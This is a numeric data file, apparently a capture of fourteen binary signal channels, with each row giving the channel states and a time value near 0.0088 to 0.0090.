1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8394920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8395160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8395400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8395480e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8395920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8396200e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,8.8396240e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8396280e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8396440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8396680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8396920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8397160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8397400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8397680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8397920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8398160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8398200e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8398680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8398920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8399000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8399160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8399400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8399640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8399920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8399960e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8400440e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8400680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8400760e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8400920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8401160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8401400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8401640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8401920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8402200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8402680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8402920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8403160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8403400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8403920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8404200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8404440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8404680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8404920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8405160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8405400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8405640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8405920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8406200e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8406680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8406920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8407000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8407160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8407400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8407480e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8407920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8408200e-03 1,1,0,0,1,1,0,0,0,0,0,0,0,0,8.8408240e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8408280e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8408440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8408680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8408920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8409160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8409400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8409680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8409920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8410160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8410200e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8410680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8410920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8411000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8411160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8411400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8411640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8411920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8412200e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8412440e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8412680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8412920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8413160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8413400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8413640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8413920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8414200e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8414440e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8414680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8414920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8415160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8415400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8415680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8415920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8416160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8416440e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8416920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8417160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8417240e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8417400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8417640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8417920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8418200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8418440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8418680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8419160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8419400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8419680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8419920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8420160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8420440e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8420680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8420920e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8421160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8421400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8421480e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8421920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8422200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8422440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8422680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8422920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8423160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8423240e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8423680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8423920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8424000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8424200e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8424440e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8424680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8424920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8425160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8425400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8425920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8426200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8426440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8426680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8426920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8427160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8427400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8427680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8427920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8428160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8428440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8428680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8428920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8429160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8429400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8429640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8429920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8430200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8430680e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8430920e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8431160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8431400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8431640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8431920e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8431960e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8432200e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8432440e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8432680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8432920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8433000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8433400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8433680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8433920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8434160e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8434200e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8434680e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8434920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8435000e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8435160e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8435400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8435640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8435880e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8436120e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8436400e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8436640e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8436920e-03 1,1,0,0,1,1,0,0,0,1,0,0,1,0,8.8437400e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8437640e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8437720e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8437880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8438120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8438400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8438640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8438920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8439160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8439400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8439640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8439880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8440120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8440400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8440640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8440920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8441160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8441400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8441640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8441880e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8442120e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8442400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8442640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8442920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8443160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8443400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8443640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8443920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8444200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8444440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8444680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8444920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8445160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8445400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8445680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8445920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8446160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8446440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8446680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8446920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8447160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8447400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8447640e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8447920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8448200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8448440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8448680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8448920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8449160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8449400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8449680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8449920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8450200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8450440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8450680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8450920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8451160e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8451400e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8451680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8451920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8452200e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8452440e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8452680e-03 1,1,0,0,1,0,0,0,0,0,0,0,1,0,8.8452920e-03 1,1,0,0,1,0,0,0,0,0,0,0,0,0,8.8453200e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,0,8.8453240e-03 1,1,0,0,1,1,0,0,0,1,0,0,0,1,8.9697440e-03 0,0,0,0,1,1,0,0,0,1,0,0,0,1,8.9699560e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,8.9699760e-03 0,0,1,0,1,1,0,0,0,1,0,1,0,1,8.9699960e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,8.9700280e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,1,8.9703800e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,1,8.9704040e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,1,8.9704080e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,8.9704120e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,1,8.9704520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,8.9704760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,1,8.9705280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,1,8.9705520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9705800e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9706040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9706280e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9706760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9707000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9707520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9707800e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9708040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9708280e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9708520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9708760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9709280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9709520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9710040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9710280e-03 0,0,1,0,1,0,0,0,0,1,0,0,0,0,8.9710320e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9710360e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9710760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9711000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9711080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9711560e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9711800e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9712280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9712520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9712760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9713000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9713080e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9713280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9713520e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9713560e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9713600e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9714040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9714280e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9714760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9715000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9715520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9715800e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9716280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9716520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9716600e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9716760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9717000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9717080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9717280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9717520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9717560e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9718040e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9718280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9718360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9718520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9718760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9719000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9719280e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9719520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9719720e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9720040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9720280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9720320e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9720760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9721000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9721080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9721280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9721520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9721760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9722040e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9722280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9722520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9722600e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9723040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9723280e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9723760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9724040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9724520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9724760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9724840e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9725000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9725280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9725320e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9725520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9725800e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9726040e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9726280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9726360e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9726760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9727000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9727520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9727760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9728280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9728520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9729040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9729280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9729320e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9729520e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9729720e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9729840e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9729880e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9730040e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9730280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9730320e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9730760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9731000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9731080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9731280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9731520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9731760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9732040e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9732280e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9732520e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9732760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9733000e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9733040e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9733480e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9733760e-03 0,0,1,0,1,1,0,0,0,0,0,0,0,0,8.9733800e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9733840e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9734000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9734240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9734520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9734760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9735000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9735240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9735480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9735720e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9736000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9736240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9736520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9736760e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9737000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9737240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9737480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9737720e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9738000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9738240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9738760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9739000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9739480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9739760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9739800e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9740280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9740520e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9740600e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9741000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9741240e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9741760e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9742000e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9742280e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9742520e-03 0,0,1,0,1,1,0,0,0,1,0,0,1,0,8.9742760e-03 0,0,1,0,1,1,0,0,0,1,0,0,0,0,8.9743000e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9743080e-03 0,0,1,0,1,0,0,0,0,0,0,0,1,0,8.9743480e-03 0,0,1,0,1,0,0,0,0,0,0,0,0,0,8.9743760e-03 